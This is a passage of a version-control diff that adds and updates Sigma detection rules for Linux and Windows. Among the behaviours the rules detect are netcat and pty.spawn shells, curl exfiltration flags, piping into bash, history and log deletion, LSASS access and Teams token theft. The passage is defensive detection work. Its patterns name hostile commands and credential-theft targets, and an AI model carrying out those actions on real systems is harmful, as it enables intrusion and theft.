    - Legitimate administration activities
@@ -0,0 +1,26 @@
+title: Disable Or Stop Services
+id: de25eeb8-3655-4643-ac3a-b662d3f26b6b
+status: experimental
+description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
+author: Nasreddine Bencherchali
+date: 2022/09/15
+references:
+    - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html
+tags:
+    - attack.defense_evasion
+logsource:
+    category: process_creation
+    product: linux
+detection:
+    selection:
+        Image|endswith:
+            - '/service'
+            - '/systemctl'
+            - '/chkconfig'
+        CommandLine|contains:
+            - 'stop'
+            - 'disable'
+    condition: selection
+falsepositives:
+    - Legitimate administration activities
+level: medium
@@ -0,0 +1,37 @@
+title: Suspicious Curl File Upload - Linux
+id: 00b90cc1-17ec-402c-96ad-3a8117d7a582
+related:
+    - id: 00bca14a-df4e-4649-9054-3f2aa676bc04
+      type: derived
+status: experimental
+description: Detects a suspicious curl process start the adds a file to a web request
+author: Nasreddine Bencherchali
+references:
+    - https://twitter.com/d1r4c/status/1279042657508081664
+    - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76
+    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file
+    - https://curl.se/docs/manpage.html
+    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
+date: 2022/09/15
+logsource:
+    category: process_creation
+    product: linux
+detection:
+    selection:
+        Image|endswith: '/curl'
+        CommandLine|contains:
+            - ' -F '
+            - ' --form' # Also covers the "--form-string"
+            - ' -T '
+            - ' --upload-file '
+            - ' -d '
+            - ' --data '
+            - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode"
+    condition: selection
+falsepositives:
+    - Scripts created by developers and admins
+level: medium
+tags:
+    - attack.exfiltration
+    - attack.t1567
+    - attack.t1105
@@ -0,0 +1,28 @@
+title: Suspicious Curl Change User Agents - Linux
+id: b86d356d-6093-443d-971c-9b07db583c68
+related:
+    - id: 3286d37a-00fd-41c2-a624-a672dcd34e60
+      type: derived
+status: experimental
+description: Detects a suspicious curl process start on linux with set useragent options
+author: Nasreddine Bencherchali
+references:
+    - https://curl.se/docs/manpage.html
+date: 2022/09/15
+logsource:
+    category: process_creation
+    product: linux
+detection:
+    selection:
+        Image|endswith: '/curl'
+        CommandLine|contains:
+            - ' -A '
+            - ' --user-agent '
+    condition: selection
+falsepositives:
+    - Scripts created by developers and admins
+    - Administrative activity
+level: medium
+tags:
+    - attack.command_and_control
+    - attack.t1071.001
@@ -4,23 +4,31 @@ status: experimental
 description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity
 author: Florian Roth
 references:
-  - https://github.com/sleventyeleven/linuxprivchecker/
+    - https://github.com/sleventyeleven/linuxprivchecker/
+    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
 date: 2022/06/20
+modified: 2022/09/15
 logsource:
-  category: process_creation
-  product: linux
+    category: process_creation
+    product: linux
 detection:
-  selection:
-    Image|endswith: '/rm'
-  selection_history:
-    - CommandLine|contains: 
-      - '/.bash_history'
-      - '/.zsh_history'
-    - CommandLine|endswith: '_history'
-  condition: all of selection*
+    selection:
+        Image|endswith:
+            - '/rm'
+            - '/unlink'
+            - '/shred'
+    selection_history:
+        - CommandLine|contains:
+            - '/.bash_history'
+            - '/.zsh_history'
+        - CommandLine|endswith:
+            - '_history'
+            - '.history'
+            - 'zhistory'
+    condition: all of selection*
 falsepositives:
-  - Legitimate administration activities
+    - Legitimate administration activities
 level: high
 tags:
-  - attack.impact
-  - attack.t1565.001
+    - attack.impact
+    - attack.t1565.001
@@ -4,23 +4,32 @@ status: experimental
 description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
 author: Florian Roth
 references:
-  - https://github.com/sleventyeleven/linuxprivchecker/
+    - https://github.com/sleventyeleven/linuxprivchecker/
+    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
 date: 2022/06/20
+modified: 2022/09/15
 logsource:
-  category: process_creation
-  product: linux
+    category: process_creation
+    product: linux
 detection:
-  selection:
-    Image|endswith: '/cat'
-  selection_history:
-    - CommandLine|contains: 
-      - '/.bash_history'
-      - '/.zsh_history'
-    - CommandLine|endswith: '_history'
-  condition: all of selection*
+    selection:
+        Image|endswith:
+            - '/cat'
+            - '/head'
+            - '/tail'
+            - '/more'
+    selection_history:
+        - CommandLine|contains:
+            - '/.bash_history'
+            - '/.zsh_history'
+        - CommandLine|endswith:
+            - '_history'
+            - '.history'
+            - 'zhistory'
+    condition: all of selection*
 falsepositives:
-  - Legitimate administration activities
+    - Legitimate administration activities
 level: medium
 tags:
-  - attack.reconnaissance
-  - attack.t1592.004
+    - attack.reconnaissance
+    - attack.t1592.004
@@ -3,29 +3,28 @@ id: ea3ecad2-db86-4a89-ad0b-132a10d2db55
 status: experimental
 description: Detects suspicious interactive bash as a parent to rather uncommon child processes
 references:
-   - Internal Research
+    - Internal Research
 date: 2022/03/14
 author: Florian Roth
 logsource:
-   product: linux
-   category: process_creation
+    product: linux
+    category: process_creation
 detection:
   selection:
-      ParentCommandLine: 'bash -i'
+        ParentCommandLine: 'bash -i'
   anomaly1:
-      CommandLine|contains:
-        - '-c import '
-        - 'base64'
-        - 'pty.spawn'
+        CommandLine|contains:
+            - '-c import '
+            - 'base64'
+            - 'pty.spawn'
   anomaly2:
-      Image|endswith: 
-         - 'whoami'
-         - 'iptables'
-         - '/ncat'
-         - '/nc'
-         - '/netcat'
+        Image|endswith:
+            - 'whoami'
+            - 'iptables'
+            - '/ncat'
+            - '/nc'
+            - '/netcat'
   condition: selection and 1 of anomaly*
 falsepositives:
-   - Legitimate software that uses these patterns
+    - Legitimate software that uses these patterns
 level: medium
-
@@ -3,7 +3,7 @@ id: 880973f3-9708-491c-a77b-2a35a1921158
 status: experimental
 description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
 references:
-   - Internal Research
+    - Internal Research
 date: 2022/03/14
 modified: 2022/07/26
 author: Florian Roth
@@ -11,26 +11,25 @@ tags:
    - attack.defense_evasion
    - attack.t1140
 logsource:
-   product: linux
-   category: process_creation
+    product: linux
+    category: process_creation
 detection:
-   selection:
-      CommandLine|startswith:
-         - 'sh -c '
-         - 'bash -c '
-   selection_exec:
-      - CommandLine|contains:
+    selection:
+        CommandLine|startswith:
+            - 'sh -c '
+            - 'bash -c '
+    selection_exec:
+        - CommandLine|contains:
            - '| bash '
            - '| sh '
            - '|bash '
            - '|sh '
-      - CommandLine|endswith:
+        - CommandLine|endswith:
            - '| bash'
            - '| sh'
            - '|bash'
            - ' |sh'
-   condition: all of selection*
+    condition: all of selection*
 falsepositives:
   - Legitimate software that uses these patterns
 level: medium
-
@@ -6,13 +6,13 @@ author: Ömer Günal and remotephone, oscd.community
 references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md
 date: 2020/10/06
-modified: 2022/07/11
+modified: 2022/09/15
 logsource:
    category: process_creation
    product: linux
 detection:
-    selection1:
-        Image|endswith:
+    selection:
+        - Image|endswith:
            - '/firewall-cmd'
            - '/ufw'
            - '/iptables'
@@ -22,9 +22,8 @@ detection:
            - '/ifconfig'
            - '/systemd-resolve'
            - '/route'
-    selection2:
-        CommandLine|contains: '/etc/resolv.conf'
-    condition: 1 of selection*
+        - CommandLine|contains: '/etc/resolv.conf'
+    condition: selection
 falsepositives:
    - Legitimate administration activities
 level: informational
@@ -4,20 +4,19 @@ status: experimental
 description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
 author: Nasreddine Bencherchali
 references:
-  - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275
+    - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275
 date: 2022/07/05
 logsource:
-  category: process_creation
-  product: linux
+    category: process_creation
+    product: linux
 detection:
-  selection:
-    Image|endswith: '/sudo'
-    CommandLine|contains: 'execve_hijack'
-  condition: selection
+    selection:
+        Image|endswith: '/sudo'
+        CommandLine|contains: 'execve_hijack'
+    condition: selection
 falsepositives:
-  - Unlikely
+    - Unlikely
 level: high
 tags:
-  - attack.defense_evasion
-  - attack.privilege_escalation
-
+    - attack.defense_evasion
+    - attack.privilege_escalation
@@ -4,24 +4,24 @@ status: experimental
 description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
 author: Nasreddine Bencherchali
 references:
-  - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh
+    - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh
 date: 2022/07/05
 logsource:
-  category: process_creation
-  product: linux
+    category: process_creation
+    product: linux
 detection:
-  selection:
-    Image|endswith: '/sudo'
-    CommandLine|contains|all:
-      - ' tc '
-      - ' enp0s3 '
-    CommandLine|contains:
-      - ' qdisc '
-      - ' filter '
-  condition: selection
+    selection:
+        Image|endswith: '/sudo'
+        CommandLine|contains|all:
+            - ' tc '
+            - ' enp0s3 '
+        CommandLine|contains:
+            - ' qdisc '
+            - ' filter '
+    condition: selection
 falsepositives:
-  - Unlikely
+    - Unlikely
 level: high
 tags:
-  - attack.defense_evasion
-  - attack.t1014
+    - attack.defense_evasion
+    - attack.t1014
@@ -4,7 +4,7 @@ status: experimental
 description: Detects deletion of local audit logs
 author: remotephone, oscd.community
 date: 2020/10/11
-modified: 2022/07/07
+modified: 2022/09/16
 references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md
 logsource:
@@ -12,7 +12,10 @@ logsource:
    category: process_creation
 detection:
    selection1:
-        Image|endswith: '/rm'
+        Image|endswith:
+            - '/rm'
+            - '/unlink'
+            - '/shred'
    selection_cli_1:
        CommandLine|contains: '/var/log'
    selection_cli_2:
@@ -11,7 +11,7 @@ logsource:
 detection:
    selection:
        cs-method: 'POST'
-        c-uri|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the host header to spot the difference between benign and malicious requests to this URL
+        c-uri|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the contents of the post body and look for any suspicious hosts that might be controlled by the attacker
    condition: selection
 falsepositives:
    - Vulnerability scanners
@@ -1,9 +1,10 @@
-title: An Application Is Uninstall
+title: Application Uninstalled
 id: 570ae5ec-33dc-427c-b815-db86228ad43e
 status: experimental
-description: An application have been remove check if it is a critical
+description: An application has been removed. Check if it is critical.
 author: frack113
 date: 2022/01/28
+modified: 2022/09/17
 logsource:
    product: windows
    service: application
@@ -16,6 +17,7 @@ detection:
    condition: selection
 falsepositives:
    - Unknown
+#Level is low as it can be very verbose, you can use the top or less 10 "Product Name" to have a quick overview
 level: low
 tags:
    - attack.impact
@@ -6,7 +6,7 @@ author: Bhabesh Raj
 references:
  - https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html
 date: 2020/12/14
-modified: 2022/08/11
+modified: 2022/09/22
 logsource:
  product: windows
  service: security
@@ -16,9 +16,9 @@ detection:
    EventID: 5145
    ShareName: '\\\\\*\\IPC$' # looking for the string \\*\IPC$
    RelativeTargetName|contains:
-      - 'RemCom_stdint'
-      - 'RemCom_stdoutt'
-      - 'RemCom_stderrt'
+      - 'RemCom_stdin'
+      - 'RemCom_stdout'
+      - 'RemCom_stderr'
  condition: selection1
 falsepositives:
  - Unknown
@@ -6,7 +6,7 @@ author: Roberto Rodriguez @Cyb3rWard0g, Tim Shelton
 references:
  - https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html
 date: 2019/08/15
-modified: 2022/06/30
+modified: 2022/09/18
 logsource:
  product: windows
  service: security
@@ -22,7 +22,7 @@ detection:
  condition: selection and not filter
 falsepositives:
  - Unknown
-level: high
+level: medium
 tags:
  - attack.privilege_escalation
  - attack.t1548
@@ -4,7 +4,7 @@ description: Detects process handle on LSASS process with certain access mask
 status: experimental
 author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)
 date: 2019/11/01
-modified: 2022/04/29
+modified: 2022/09/27
 references:
    - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
@@ -64,12 +64,18 @@ detection:
            - C:\Windows\SysWow64\
            - C:\Windows\SysNative\
            - C:\Program Files\
+            - C:\Program Files (x86)\
            - C:\Windows\Temp\asgard2-agent\
            - C:\ProgramData\Microsoft\Windows Defender\Platform\
    filter2:
        ProcessName|startswith: 'C:\Program Files'  # too many false positives with legitimate AV and EDR solutions
    filter3:
        ProcessName: 'C:\Windows\CCM\CcmExec.exe'
+    filter4:
+        ProcessName: 'C:\Windows\System32\taskhostw.exe'
+        AccessMask:
+            - '0x10'
+            - '0x1410'
    condition: 1 of selection_* and not 1 of filter*
 fields:
    - ComputerName
@@ -0,0 +1,27 @@
+title: Suspicious Teams Application Related ObjectAcess Event
+id: 25cde13e-8e20-4c29-b949-4e795b76f16f
+status: experimental
+description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
+author: '@SerkinValery'
+references:
+  - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/
+  - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
+date: 2022/09/16
+logsource:
+  product: windows
+  service: security
+detection:
+  selection:
+    EventID: 4663
+    ObjectName|contains:
+      - '\Microsoft\Teams\Cookies'
+      - '\Microsoft\Teams\Local Storage\leveldb'
+  filter:
+    ProcessName|contains: '\Microsoft\Teams\current\Teams.exe'
+  condition: selection and not filter
+falsepositives:
+  - Unknown
+level: high
+tags:
+  - attack.credential_access
+  - attack.t1528
@@ -6,13 +6,13 @@ references:
    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool
 author: Bhabesh Raj
 date: 2022/08/02
-modified: 2022/08/05
+modified: 2022/09/28
 tags:
    - attack.defense_evasion
    - attack.t1574.002
 logsource:
    product: windows
-    category: security-mitigations
+    service: security-mitigations
 detection:
    selection:
        EventID:
@@ -6,13 +6,13 @@ references:
    - https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv
 author: Nasreddine Bencherchali
 date: 2022/08/03
-modified: 2022/08/05
+modified: 2022/09/28
 tags:
    - attack.defense_evasion
    - attack.t1574.002
 logsource:
    product: windows
-    category: security-mitigations
+    service: security-mitigations
 detection:
    selection:
        EventID:
@@ -0,0 +1,28 @@
+title: Failed Mounting of Hidden Share
+id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb
+description: Detects repeated failed (outgoing) attempts to mount a hidden share
+author: Fabian Franz
+status: experimental
+level: medium
+references:
+    - https://twitter.com/moti_b/status/1032645458634653697
+    - https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5
+date: 2022/08/30
+modified: 2022/08/30
+logsource:
+    product: windows
+    service: smbclient-security
+detection:
+    selection:
+        EventID: 31010
+        ShareName|endswith: '$'
+    timeframe: 1m
+    condition: selection | count() > 10
+fields:
+    - ShareName
+falsepositives:
+    - Legitimate administrative activity
+    - Faulty scripts
+tags:
+    - attack.t1021.002
+    - attack.lateral_movement
@@ -1,9 +1,9 @@
-title: Suspicious Ldap Domain Access
+title: Suspicious LDAP Domain Access
 id: a21bcd7e-38ec-49ad-b69a-9ea17e69509e
-description: Detect suspicious ldap request from non Windows application
+description: Detect suspicious LDAP request from non-Windows application
 status: experimental
 date: 2022/08/20
-modified: 2022/09/08
+modified: 2022/09/21
 author: frack113
 references:
    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md
@@ -16,10 +16,15 @@ detection:
    filter_windows:
        Image|startswith: 'C:\Windows\'
    filter_defender:
-        Image|startswith: 'C:\ProgramData\Microsoft\Windows Defender\Platform\'
+        Image|startswith:
+            - 'C:\ProgramData\Microsoft\Windows Defender\Platform\'
+            - 'C:\Program Files\Windows Defender\MsMpEng.exe'
+            - 'C:\Program Files (x86)\Windows Defender\MsMpEng.exe'
        Image|endswith: '\MsMpEng.exe'
    filter_unknown:
        Image: '<unknown process>'
+    filter_azure:
+        Image|startswith: 'C:\WindowsAzure\GuestAgent'
    condition: dns_request and not 1 of filter_*
 falsepositives:
    - Programs that also lookup the observed domain
@@ -4,22 +4,24 @@ status: test
 description: A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files.
 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
 references:
-  - https://github.com/OTRF/detection-hackathon-apt29/issues/9
-  - https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html
+    - https://github.com/OTRF/detection-hackathon-apt29/issues/9
+    - https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html
 date: 2020/05/02
-modified: 2021/11/27
+modified: 2022/09/21
 logsource:
-  product: windows
-  category: file_delete
+    product: windows
+    category: file_delete
 detection:
-  selection:
-    TargetFilename|endswith:
-      - '.AAA'
-      - '.ZZZ'
-  condition: selection
+    selection:
+        TargetFilename|endswith:
+            - '.AAA'
+            - '.ZZZ'
+    filter_wireshark:
+        TargetFilename|endswith: '\Wireshark\radius\dictionary.alcatel-lucent.aaa'
+    condition: selection and not 1 of filter_*
 falsepositives:
-  - Legitime usage of SDelete
+    - Legitime usage of SDelete
 level: medium
 tags:
-  - attack.defense_evasion
-  - attack.t1070.004
+    - attack.defense_evasion
+    - attack.t1070.004
@@ -0,0 +1,26 @@
+title: Suspicious File Event With Teams Objects
+id: 6902955a-01b7-432c-b32a-6f5f81d8f624
+status: experimental
+description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
+author: '@SerkinValery'
+references:
+  - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/
+  - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
+date: 2022/09/16
+logsource:
+  product: windows
+  category: file_event
+detection:
+  selection:
+    TargetFilename|contains:
+      - '\Microsoft\Teams\Cookies'
+      - '\Microsoft\Teams\Local Storage\leveldb'
+  filter:
+    Image|contains: '\Microsoft\Teams\current\Teams.exe'
+  condition: selection and not filter
+falsepositives:
+  - Unknown
+level: high
+tags:
+  - attack.credential_access
+  - attack.t1528
@@ -6,7 +6,7 @@ author: Teymur Kheirkhabarov, oscd.community
 references:
  - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
 date: 2019/11/01
-modified: 2022/01/11
+modified: 2022/09/21
 logsource:
  category: file_event
  product: windows
@@ -38,6 +38,7 @@ detection:
      - '\servpw64.exe'
      - '\pwdump.exe'
      - '\procdump64.exe'
+      - '\Dumpy.exe'
  condition: selection
 falsepositives:
  - Legitimate Administrator using tool for password recovery
@@ -6,7 +6,7 @@ author: Nasreddine Bencherchali
 references:
    - https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/
 date: 2022/06/10
-modified: 2022/06/21
+modified: 2022/09/20
 logsource:
    product: windows
    category: file_event
@@ -20,7 +20,9 @@ detection:
        # This filter is for Sigma dataset you could remove it or change when using the rule in your own env
        Image|startswith: 'C:\Users\'
        Image|contains: '\AppData\Local\Temp\'
-        Image|endswith: '\target.exe'
+        Image|endswith:
+            - '\target.exe'
+            - 'Installer.x64.exe'
    condition: selection and not 1 of filter*
 falsepositives:
    - Possible FPs during first installation of Notepad++
@@ -15,7 +15,7 @@ logsource:
    product: windows
 detection:
    selection: # %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\target.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}\target.lnk
-        TargetFileName|contains|all:
+        TargetFilename|contains|all:
            - '\Microsoft\Windows\Start Menu\Programs\Startup'
            - '.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}'
        Image|endswith: '\explorer.exe'
@@ -4,25 +4,28 @@ status: test
 description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
 author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)
 references:
-  - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/
+    - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/
 date: 2020/03/19
-modified: 2021/12/03
+modified: 2022/09/20
 logsource:
-  product: windows
-  category: file_event
+    product: windows
+    category: file_event
 detection:
-  selection:
-    TargetFilename|endswith: '\desktop.ini'
-  filter:
-    Image|startswith:
-      - 'C:\Windows\'
-      - 'C:\Program Files\'
-      - 'C:\Program Files (x86)\'
-  condition: selection and not filter
+    selection:
+        TargetFilename|endswith: '\desktop.ini'
+    filter_generic:
+        Image|startswith:
+            - 'C:\Windows\'
+            - 'C:\Program Files\'
+            - 'C:\Program Files (x86)\'
+    filter_jetbrains:
+        Image|endswith: '\AppData\Local\JetBrains\Toolbox\bin\7z.exe'
+        TargetFilename|contains: '\JetBrains\apps\'
+    condition: selection and not 1 of filter_*
 falsepositives:
-  - Operations performed through Windows SCCM or equivalent
-  - Read only access list authority
+    - Operations performed through Windows SCCM or equivalent
+    - Read only access list authority
 level: medium
 tags:
-  - attack.persistence
-  - attack.t1547.009
+    - attack.persistence
+    - attack.t1547.009
@@ -14,11 +14,11 @@ logsource:
    category: file_event
 detection:
    selection1:
-        TargetFilename|endswith: 
+        TargetFilename|endswith:
            - '\TeamViewer\RemotePrinting\tvprint.db'
            - '\TeamViewer\TVNetwork.log'
    selection2:
-        TargetFilename|contains|all: 
+        TargetFilename|contains|all:
            - '\TeamViewer'
            - '_Logfile.log'
    condition: 1 of selection*
@@ -6,37 +6,34 @@ author: Beyu Denis, oscd.community, Tim Shelton
 references:
  - PT ESC rule and personal experience
 date: 2019/10/22
-modified: 2022/05/24
+modified: 2022/09/18
 logsource:
  product: windows
  category: file_event
 detection:
-  selection_2:
+  selection_wwwroot:
    TargetFilename|contains: '\inetpub\wwwroot\'
-  selection_3:
+  selection_ext1:
    TargetFilename|contains:
      - '.asp'
      - '.ashx'
      - '.ph'
-  selection_4:
+  selection_static:
    TargetFilename|contains:
      - '\www\'
      - '\htdocs\'
      - '\html\'
-  selection_5:
+  selection_ext2:
    TargetFilename|contains: '.ph'
-  selection_6:
-    - TargetFilename|endswith: '.jsp'
-    - TargetFilename|contains|all:
-      - '\cgi-bin\'
-      - '.pl'
  false_positive1:    # false positives when unpacking some executables in $TEMP
    TargetFilename|contains:
      - '\AppData\Local\Temp\'
      - '\Windows\Temp\'
-  false_positive2:
+  false_positive_system:
    Image: 'System' # fp : backup/restore from drivers
-  condition: not false_positive2 and ( (selection_2 and selection_3 and not false_positive1) or (selection_4 and selection_5 and not false_positive1) or (selection_6 and not false_positive1) )
+  false_positive_legitimate:
+    TargetFilename|contains: '\xampp'
+  condition: ((selection_wwwroot and selection_ext1) or (selection_static and selection_ext2)) and not 1 of false_positive*
 falsepositives:
  - Legitimate administrator or developer creating legitimate executable files in a web application folder
 level: high
@@ -18,7 +18,7 @@ detection:
        Image|endswith:
            - '\rundll32.exe'
            #- '\svchost.exe' # Might generate some FP
-            - '\dllhost.exe'
+            #- '\dllhost.exe' # Too many FPs
            - '\smss.exe'
            - '\RuntimeBroker.exe'
            - '\sihost.exe'
@@ -7,7 +7,7 @@ references:
    - https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/
 author: frack113
 date: 2022/07/16
-modified: 2022/08/31
+modified: 2022/09/20
 tags:
    - attack.impact
    - attack.t1486
@@ -26,7 +26,7 @@ detection:
            - '.jpeg'
            - '.png'
            - '.pdf'
-        TargetFilename|contains: 
+        TargetFilename|contains:
            - '.lnk.'
            - '.rtf.'
            - '.pst.'
@@ -36,7 +36,7 @@ detection:
            - '.jpeg.'
            - '.png.'
            - '.pdf.'
-    filter:
+    filter_generic:
        TargetFilename|endswith:
            - '.tmp'
            - '.bak'
@@ -44,7 +44,10 @@ detection:
            - '.orig'
            - '.backup'
            - '.temp'
-    condition: selection and not filter
+    filter_anaconda:
+        TargetFilename|startswith: 'C:\ProgramData\Anaconda3\'
+        TargetFilename|endswith: '.c~'
+    condition: selection and not 1 of filter_*
 falsepositives:
    - Backup software
 level: medium
@@ -6,6 +6,7 @@ references:
    - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)
 author: Nasreddine Bencherchali, Wietze Beukema (project and research)
 date: 2022/08/17
+modified: 2022/09/21
 tags:
    - attack.defense_evasion
    - attack.persistence
@@ -19,10 +20,13 @@ detection:
    # Bitdefender
    selection_bitdefender:
        ImageLoaded|endswith: '\log.dll'
-    filter_bitdefender:
+    filter_log_dll_bitdefender:
        ImageLoaded|startswith:
            - 'C:\Program Files\Bitdefender Antivirus Free\'
            - 'C:\Program Files (x86)\Bitdefender Antivirus Free\'
+    filter_log_dll_other:
+        - ImageLoaded: 'C:\Program Files\Dell\SARemediation\plugin\log.dll'
+        - ImageLoaded|startswith: 'C:\Program Files\Canon\MyPrinter\'
    # F-Secure
    selection_fsecure:
        ImageLoaded|endswith: '\qrt.dll'
@@ -40,7 +44,9 @@ detection:
        ImageLoaded|startswith:
            - 'C:\Program Files\McAfee\'
            - 'C:\Program Files (x86)\McAfee\'
-    condition: (selection_bitdefender and not filter_bitdefender) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee)
+    condition: (selection_bitdefender and not 1 of filter_log_dll_*) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee)
 falsepositives:
-    - Unknown
+    - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.
+    - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file.
+    - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file
 level: medium
@@ -8,7 +8,7 @@ references:
    - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ # iphlpapi.dll
 author: Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex)
 date: 2022/08/14
-modified: 2022/09/11
+modified: 2022/09/27
 tags:
    - attack.defense_evasion
    - attack.persistence
@@ -416,11 +416,15 @@ detection:
            - 'C:\Windows\SysWOW64\'
            - 'C:\Windows\WinSxS\'
            - 'C:\Windows\SoftwareDistribution\'
-    filter_systemp:
-        ImageLoaded|startswith: 'C:\Windows\SystemTemp\'
+            - 'C:\Windows\SystemTemp\'
    filter_appvpolicy:
-        ImageLoaded: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll
-        Image: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
+        ImageLoaded: 'C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll'
+        Image: 'C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe'
+    filter_azure:
+        ImageLoaded|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'
+    filter_dell:
+        Image: 'C:\Windows\System32\backgroundTaskHost.exe'
+        ImageLoaded|startswith: 'C:\Program Files\WindowsApps\DellInc.DellSupportAssistforPCs'
    condition: selection and not 1 of filter_*
 falsepositives:
    - Legitimate applications loading their own versions of the DLLs mentioned in this rule
@@ -8,7 +8,7 @@ references:
  - https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html
  - https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
 date: 2019/10/27
-modified: 2022/08/09
+modified: 2022/09/15
 logsource:
  category: image_load
  product: windows
@@ -35,7 +35,7 @@ detection:
      - '\cscript.exe'
      - '\mshta.exe'
      # - '\regsvr32.exe'  triggered by installing common software
-      - '\schtasks.exe'
+      # - '\schtasks.exe'  triggered by installing software
      - '\dnx.exe'
      - '\regsvcs.exe'
      - '\sc.exe'
@@ -3,29 +3,31 @@ id: cbb56d62-4060-40f7-9466-d8aaf3123f83
 description: Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.
 status: experimental
 date: 2020/05/03
-modified: 2021/12/05
+modified: 2022/09/21
 author: Patrick St. John, OTR (Open Threat Research)
 tags:
-  - attack.defense_evasion
-  - attack.t1027.002
+    - attack.defense_evasion
+    - attack.t1027.002
 references:
-  - https://www.py2exe.org/
-  - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/
+    - https://www.py2exe.org/
+    - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/
 logsource:
-  product: windows
-  category: image_load
+    product: windows
